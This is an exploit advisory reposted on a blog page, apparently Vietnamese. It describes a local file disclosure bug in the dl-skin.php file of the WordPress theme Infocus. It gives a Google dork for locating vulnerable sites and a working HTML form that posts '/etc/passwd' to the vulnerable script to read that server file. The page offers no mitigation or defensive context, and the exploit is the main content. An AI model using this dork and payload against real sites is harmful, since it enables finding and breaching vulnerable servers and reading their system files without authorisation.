Bài liên quan
[+] Post Local File Disclosure in wordpress theme Infocus
 
[+] Date: 07/06/2014
 
[+] CWE Number: CWE-98
 
[+] Risk: High
 
[+] Author: Felipe Andrian Peixoto
 
[+] Dork:inurl:"/wp-content/themes/infocus/"
 
[+] Vendor Homepage: http://themeforest.net/item/infocus-powerful-professional-wordpress-theme/85486
 
[+] Contact: felipe_andrian@hotmail.com
 
[+] Tested on: Windows 7 and Linux
 
[+] Vulnerable File: dl-skin.php
 
[+] Exploit :
 
<html>
<body>
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
 
eof

Post a Comment

 
Top

Nhận xét mới đăng tải!

Loading…
X